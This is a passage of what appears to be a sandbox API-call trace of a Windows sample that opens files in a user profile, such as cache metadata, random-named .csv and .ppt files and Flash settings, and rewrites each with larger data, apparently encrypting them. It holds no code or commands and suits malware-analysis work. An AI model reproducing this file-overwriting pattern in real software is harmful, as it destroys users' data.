lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x18e [0178.638] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0178.638] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.638] ReleaseMutex (hMutex=0x168) returned 1 [0178.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0178.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", cchWideChar=65, lpMultiByteStr=0x1faca24, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpUsedDefaultChar=0x0) returned 65 [0178.639] ReadFile (in: hFile=0x1dc, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x18e, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x2fdf2bc*=0x18e, lpOverlapped=0x0) returned 1 [0178.640] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0178.640] WriteFile (in: hFile=0x1dc, lpBuffer=0x286daa8*, nNumberOfBytesToWrite=0x716, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x286daa8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x716, lpOverlapped=0x0) returned 1 [0178.640] CloseHandle (hObject=0x1dc) returned 1 [0178.640] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0178.642] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0178.642] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x186 [0178.642] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0178.642] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.642] ReleaseMutex (hMutex=0x168) returned 1 [0178.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0178.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", cchWideChar=65, lpMultiByteStr=0x1faca24, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpUsedDefaultChar=0x0) returned 65 [0178.642] ReadFile (in: hFile=0x1dc, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x186, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x2fdf2bc*=0x186, lpOverlapped=0x0) returned 1 [0178.643] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0178.644] WriteFile (in: hFile=0x1dc, lpBuffer=0x286daa8*, nNumberOfBytesToWrite=0x70e, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x286daa8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x70e, lpOverlapped=0x0) returned 1 [0178.644] CloseHandle (hObject=0x1dc) returned 1 [0178.644] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0178.647] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0178.647] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x186 [0178.647] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0178.647] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.648] ReleaseMutex (hMutex=0x168) returned 1 [0178.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0178.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", cchWideChar=65, lpMultiByteStr=0x1faca24, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpUsedDefaultChar=0x0) returned 65 [0178.648] ReadFile (in: hFile=0x1dc, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x186, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x2fdf2bc*=0x186, lpOverlapped=0x0) returned 1 [0178.649] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0178.649] WriteFile (in: hFile=0x1dc, lpBuffer=0x286daa8*, nNumberOfBytesToWrite=0x70e, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x286daa8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x70e, lpOverlapped=0x0) returned 1 [0178.649] CloseHandle (hObject=0x1dc) returned 1 [0178.650] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0178.650] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0178.650] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x182 [0178.651] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0178.651] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.651] ReleaseMutex (hMutex=0x168) returned 1 [0178.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0178.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", cchWideChar=65, lpMultiByteStr=0x1faca24, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpUsedDefaultChar=0x0) returned 65 [0178.651] ReadFile (in: hFile=0x1dc, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x182, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x2fdf2bc*=0x182, lpOverlapped=0x0) returned 1 [0178.652] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0178.652] WriteFile (in: hFile=0x1dc, lpBuffer=0x286daa8*, nNumberOfBytesToWrite=0x70a, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x286daa8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x70a, lpOverlapped=0x0) returned 1 [0178.652] CloseHandle (hObject=0x1dc) returned 1 [0178.653] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0178.653] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0178.653] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x192 [0178.653] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0178.653] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.654] ReleaseMutex (hMutex=0x168) returned 1 [0178.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0178.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", cchWideChar=65, lpMultiByteStr=0x1faca24, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpUsedDefaultChar=0x0) returned 65 [0178.654] ReadFile (in: hFile=0x1dc, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x192, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x2fdf2bc*=0x192, lpOverlapped=0x0) returned 1 [0178.655] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0178.655] WriteFile (in: hFile=0x1dc, lpBuffer=0x286daa8*, nNumberOfBytesToWrite=0x71a, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x286daa8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x71a, lpOverlapped=0x0) returned 1 [0178.656] CloseHandle (hObject=0x1dc) returned 1 [0178.656] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f90f18257cbb4d84216ac1e1f3bb2c76"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0178.656] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0178.656] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xfc [0178.657] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0178.657] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.657] ReleaseMutex (hMutex=0x168) returned 1 [0178.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="F90F18257CBB4D84216AC1E1F3BB2C76", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0178.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="F90F18257CBB4D84216AC1E1F3BB2C76", cchWideChar=32, lpMultiByteStr=0x1fa54dc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="F90F18257CBB4D84216AC1E1F3BB2C76", lpUsedDefaultChar=0x0) returned 32 [0178.657] ReadFile (in: hFile=0x1dc, lpBuffer=0x1eea868, nNumberOfBytesToRead=0xfc, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eea868*, lpNumberOfBytesRead=0x2fdf2bc*=0xfc, lpOverlapped=0x0) returned 1 [0178.658] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0178.658] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x684, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x2fdf2d0*=0x684, lpOverlapped=0x0) returned 1 [0178.658] CloseHandle (hObject=0x1dc) returned 1 [0178.658] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\A6WwSzi9EwLYN46Z.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\a6wwszi9ewlyn46z.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0178.659] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0178.659] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xbb7c [0178.659] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0178.659] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.659] ReleaseMutex (hMutex=0x168) returned 1 [0178.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="A6WwSzi9EwLYN46Z.csv", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0178.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="A6WwSzi9EwLYN46Z.csv", cchWideChar=20, lpMultiByteStr=0x1f88c44, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A6WwSzi9EwLYN46Z.csv", lpUsedDefaultChar=0x0) returned 20 [0178.659] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a96d8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a96d8*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0178.661] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xab7c [0178.661] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0178.661] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xab7c [0178.661] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a96d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a96d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0178.662] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0178.662] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a96d8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a96d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0178.662] CloseHandle (hObject=0x1dc) returned 1 [0178.663] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\d5rDiK8ifZi3jWTm5_B.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\d5rdik8ifzi3jwtm5_b.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0178.663] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0178.663] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xc911 [0178.663] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0178.664] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.664] ReleaseMutex (hMutex=0x168) returned 1 [0178.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="d5rDiK8ifZi3jWTm5_B.ppt", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0178.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="d5rDiK8ifZi3jWTm5_B.ppt", cchWideChar=23, lpMultiByteStr=0x1f88c44, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d5rDiK8ifZi3jWTm5_B.ppt", lpUsedDefaultChar=0x0) returned 23 [0178.664] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a96d8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a96d8*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0179.691] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xb911 [0179.692] ReadFile (in: hFile=0x1dc, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0179.692] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xb911 [0179.692] WriteFile (in: hFile=0x1dc, lpBuffer=0x289bb08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x289bb08*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0179.692] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0179.692] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0179.692] CloseHandle (hObject=0x1dc) returned 1 [0179.693] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0180.173] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.173] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1d6 [0180.173] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.173] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.173] ReleaseMutex (hMutex=0x168) returned 1 [0180.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="settings.sol", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0180.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="settings.sol", cchWideChar=12, lpMultiByteStr=0x1f7366c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="settings.sol", lpUsedDefaultChar=0x0) returned 12 [0180.174] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1d6, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x2fdf2bc*=0x1d6, lpOverlapped=0x0) returned 1 [0180.175] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0180.175] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a56c8*, nNumberOfBytesToWrite=0x75e, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x75e, lpOverlapped=0x0) returned 1 [0180.176] CloseHandle (hObject=0x1d8) returned 1 [0180.176] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2" (normalized: "c:\\users\\5p5nrgjn0js 